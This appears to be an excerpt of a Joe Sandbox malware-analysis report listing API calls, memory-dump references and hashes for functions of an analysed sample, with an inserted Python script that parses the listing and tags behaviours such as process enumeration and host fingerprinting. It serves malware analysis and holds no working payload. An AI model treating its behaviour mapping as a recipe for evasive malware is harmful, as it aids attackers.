                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 602 4390c5-439181 call 44b1f0 FindFirstFileA memset * 2
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$FileFindFirst
                                                                                                                                                                        • String ID: %s\*.*
                                                                                                                                                                        • API String ID: 2180624105-1013718255
                                                                                                                                                                        • Opcode ID: 07370fb780c961ecf0af3d7c7082cdf046c94904b0a511b25c6c9beed1cfa149
                                                                                                                                                                        • Instruction ID: 7d42249a407310c214c8f46e26e7ec32ae29d16c073ba9705e9601784c8f0509
                                                                                                                                                                        • Opcode Fuzzy Hash: 07370fb780c961ecf0af3d7c7082cdf046c94904b0a511b25c6c9beed1cfa149
                                                                                                                                                                        • Instruction Fuzzy Hash: FF11BFB1B00218ABD714DF69EC95D9A37BDEB88354F040668FA05D7341FAB4AE40CBB5
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirstwsprintf
                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                        • API String ID: 2655791690-766152087
                                                                                                                                                                        • Opcode ID: 2bc079377df668d970cf8aa9dda274538490f369c3b74130dc3a6c3863138d9a
                                                                                                                                                                        • Instruction ID: e7666cf382891cf504827687b6435c28648605b03577316b9fbddf840bdd4e2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc079377df668d970cf8aa9dda274538490f369c3b74130dc3a6c3863138d9a
                                                                                                                                                                        • Instruction Fuzzy Hash: 50012F35A102089FC324CF18EC89C6633ADFF89318B080269E808D7350EAB2AD85CBD1
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00402BE1
                                                                                                                                                                        Strings
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1974802433-1173974218
                                                                                                                                                                        • Opcode ID: e496c4a87c61f27c7071ab950c09f988eb55113fc90724f612245b9791ec29b1
                                                                                                                                                                        • Instruction ID: cdf80ab18b432466ce706905b861d013941f1127455d591d47261a58a33e80eb
                                                                                                                                                                        • Opcode Fuzzy Hash: e496c4a87c61f27c7071ab950c09f988eb55113fc90724f612245b9791ec29b1
                                                                                                                                                                        • Instruction Fuzzy Hash: F4413476A102098FCB55CB58DCD4DEA73B5BFD821970904A5E52AE7362EA34EE00CF44
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0041E42B
                                                                                                                                                                        Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump set and snapshot as the entry above (0000000F.00000002, image base 00400000, snapshot hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd)
Yara matches
Similarity
• API ID: FileFindFirst
• String ID: 0
• API String ID: 1974802433-4000257214
• Opcode ID: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
• Instruction ID: 444d2139b4423df7e404c14bc0898a50738c756d6f3279185a54cc7c24eee840
• Opcode Fuzzy Hash: 0a7e237ab8405aa26ad94c92d791244eac69c99f0dc965387448d2bddcaf2b07
• Instruction Fuzzy Hash: 9A2162B67001549FC704DF6CDDE0EA933B9EBC9604B084168E915E3362E6B4AE14CB59
APIs
• FindFirstFileA.KERNEL32(00000000,?), ref: 00421FC9
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump set and snapshot as the entry above (0000000F.00000002, image base 00400000, snapshot hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd)
Yara matches
Similarity
• API ID: FileFindFirst
• String ID: \*.*
• API String ID: 1974802433-1173974218
• Opcode ID: f26b492d590c6f12eefa27f5d3f89ee5ac1bd54bc0b47279981acb4c9aab51aa
• Instruction ID: d1189efa58fda6785e8e3e902c189e96ec68bb8dd3af9d925bade52238774e6f
• Opcode Fuzzy Hash: f26b492d590c6f12eefa27f5d3f89ee5ac1bd54bc0b47279981acb4c9aab51aa
• Instruction Fuzzy Hash: E9215E727002149FC714DF68ED95EA973F9EFC8748B080168E815D7361EAB0AE14CB6A
APIs
• FindFirstFileA.KERNEL32(?,?), ref: 0043A11C
Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same dump set and snapshot as the entry above (0000000F.00000002, image base 00400000, snapshot hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd)
Yara matches
Similarity
• API ID: FileFindFirst
• String ID: %s\%s
• API String ID: 1974802433-4073750446
• Opcode ID: 11f224972baa5b82e91e0726b854a2c5cade10394e326f9ed94f55559d034421
• Instruction ID: a5bbe4c3e1cc24758aca5ebfd760b2f682ad06a0850f42dd23323b564b68bf0f
• Opcode Fuzzy Hash: 11f224972baa5b82e91e0726b854a2c5cade10394e326f9ed94f55559d034421
• Instruction Fuzzy Hash: 6511AD706101059FDB18DB18DC85DAA73BAEF89354B10426CE805E7392EB74AD42CBAA
APIs
• FindFirstFileA.KERNEL32(?,?), ref: 0043CE9A
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                        • API String ID: 1974802433-766152087
                                                                                                                                                                        • Opcode ID: 492fed63528f9666cf56d314b61d3ff12040296f02c45a4fddacab92b17814b8
                                                                                                                                                                        • Instruction ID: 3c9a1035a41002c96e52dd734289975c3edbd3d0f527fb2cfe1d7465d0a3bf71
                                                                                                                                                                        • Opcode Fuzzy Hash: 492fed63528f9666cf56d314b61d3ff12040296f02c45a4fddacab92b17814b8
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF0E2B16501099FC304DB28DC90E6937ECEB84244F040A2DE516C3392FAF6BE04CB5A
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004322AC
                                                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 004322BE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2353314856-0
                                                                                                                                                                        • Opcode ID: 4b551a2f8c201a651a9930c052f208bfed4fd8ecdbd3b0c2babbbb0d043d2dc1
                                                                                                                                                                        • Instruction ID: b69c32facdc4b08414828b22e28b057fef1b3e9cb479eda9d9e38ec789d1a072
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b551a2f8c201a651a9930c052f208bfed4fd8ecdbd3b0c2babbbb0d043d2dc1
                                                                                                                                                                        • Instruction Fuzzy Hash: A2F06D752053159FC3109B69CC68F56BBF9AF85701F598469F840DB391E7B0A800CF26
                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431595
                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32 ref: 004315A1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeapInformationTimeZone
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3362249692-0
                                                                                                                                                                        • Opcode ID: 68b39ce2041e2be763347cdb8151913b3201f6ac879e09a90a703f2528e23868
                                                                                                                                                                        • Instruction ID: 86009453ec15598c9a712ebb835fdb34e9ef70f43cf1e4d0cd16c6e0fd4b4537
                                                                                                                                                                        • Opcode Fuzzy Hash: 68b39ce2041e2be763347cdb8151913b3201f6ac879e09a90a703f2528e23868
                                                                                                                                                                        • Instruction Fuzzy Hash: 86F03079B507109FCE109F24DD89F473A68BB8B364F190954F9109B3E0D6719C018A59
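                                                                                                                                                                         The three function blocks above list the raw API calls Joe Sandbox recovered from the process 15 memory dump: a FindFirstFileA call paired with the "%s\*" string (a directory sweep), a CreateToolhelp32Snapshot/Process32First pair (process enumeration, the primitive a process-name check is built on) and a HeapAlloc/GetTimeZoneInformation pair (host fingerprinting). The Python below is an added example and is not part of the Joe Sandbox report or its tooling. It parses these lines, copied into a constructed sample, into per-function records, attaches a behaviour label of the example's own to each, and rebuilds the report's "API ID" field from the API names. That reconstruction (split the names into CamelCase words, drop the ANSI/Unicode suffix letter and the verb "Get", sort and concatenate) is inferred from the three blocks on this page only, not from Joe Sandbox documentation, and may not hold for other API names.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed sample input: the "APIs" and "Similarity" lines of three function
# blocks, copied from this report (the page's own API names, arguments and refs).
SAMPLE_REPORT = """\
APIs
• FindFirstFileA.KERNEL32(?,?), ref: 0043CE9A
Strings
Similarity
• API ID: FileFindFirst
• String ID: %s\\*
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004322AC
• Process32First.KERNEL32(00000000,?), ref: 004322BE
Similarity
• API ID: CreateFirstProcess32SnapshotToolhelp32
• String ID:
APIs
• HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00431595
• GetTimeZoneInformation.KERNEL32 ref: 004315A1
Similarity
• API ID: AllocHeapInformationTimeZone
• String ID:
"""

# "• Name.MODULE(arg,arg), ref: 0043CE9A"; the argument list is optional and,
# when it is absent, so is the comma before "ref" (see GetTimeZoneInformation).
API_LINE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_LINE = re.compile(r"^•\s*(?P<key>API ID|String ID):\s*(?P<value>.*)$")

ApiCall = namedtuple("ApiCall", "name module args ref")


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # ApiCall objects, in listing order
    strings: list = field(default_factory=list)  # non-empty "String ID" values
    api_id: str = ""                             # the report's own "API ID" field


def parse_blocks(text):
    """Split report text into FunctionBlocks; every "APIs" header opens a new one."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        if m := API_LINE.match(line):
            args = tuple(filter(None, (m["args"] or "").split(",")))
            current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"].upper()))
        elif m := FIELD_LINE.match(line):
            if m["key"] == "API ID":
                current.api_id = m["value"]
            elif m["value"]:
                current.strings.append(m["value"])
    return blocks


def reconstruct_api_id(names):
    """Rebuild the report's "API ID" from the API names.

    Inferred from the three blocks above only, not from Joe Sandbox documentation:
    split each name into CamelCase words, drop the ANSI/Unicode suffix letter and
    the verb "Get", then sort all words and concatenate them.
    """
    words = []
    for name in names:
        words += [w for w in re.findall(r"[A-Z][a-z0-9]*", name) if w not in {"A", "W", "Get"}]
    return "".join(sorted(words))


def tag_behaviour(block):
    """Label an API sequence with the behaviour it implements (labels are this example's own)."""
    names = {a.name for a in block.apis}
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32First"} <= names:
        tags.append("process-enumeration")  # the primitive a process-name check is built on
    if names & {"FindFirstFileA", "FindFirstFileW"}:
        wildcard = any("*" in s for s in block.strings)
        tags.append("directory-sweep" if wildcard else "file-lookup")
    if "GetTimeZoneInformation" in names:
        tags.append("host-fingerprinting")
    return tags


if __name__ == "__main__":
    for b in parse_blocks(SAMPLE_REPORT):
        names = [a.name for a in b.apis]
        check = "ok" if reconstruct_api_id(names) == b.api_id else "MISMATCH"
        print(f"{b.apis[0].ref}: {', '.join(names)} -> {tag_behaviour(b)} [API ID {check}]")
```

Run stand-alone it prints one line per function, keyed by the ref of its first API call, with the behaviour tags and whether the rebuilt API ID matches the report's field. The ID matches for all three blocks here, which is what makes that field usable as a clustering key when comparing function blocks across samples; treat the normalisation rules as an observation from this report rather than a specification, and extend the tag table as further API pairs of interest turn up in the listing.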
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00402BE1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                         • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                        • Opcode ID: 18ad3a6bec8f41be99c899bfcf52a0711b055a7ca27f19dffe250b18e5db78c1
                                                                                                                                                                        • Instruction ID: 9a9c7b953954357ff120384c066d06b2d19a0650d401855eed0428c55563916a
                                                                                                                                                                        • Opcode Fuzzy Hash: 18ad3a6bec8f41be99c899bfcf52a0711b055a7ca27f19dffe250b18e5db78c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D41E176B202188FCB55CB58DCD4DEA73B9FFC86197050859E52AE7362EA24AE01CF44
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00420455
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                        • Opcode ID: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                        • Instruction ID: 09395c8a0eafa750aeaa3e373b0b01c6308d5a6badcce2baeb186db3cbc76868
                                                                                                                                                                        • Opcode Fuzzy Hash: d47b22d7c2b5d8854116b83036bc1483b5f8cda757cbb595c16f5e01f296aa4b
                                                                                                                                                                        • Instruction Fuzzy Hash: C5314BB5702954AFD700DFACEC98E5D7BE5FF98300B044068E859D7361EAB8AE058B45
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00424A63
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID:
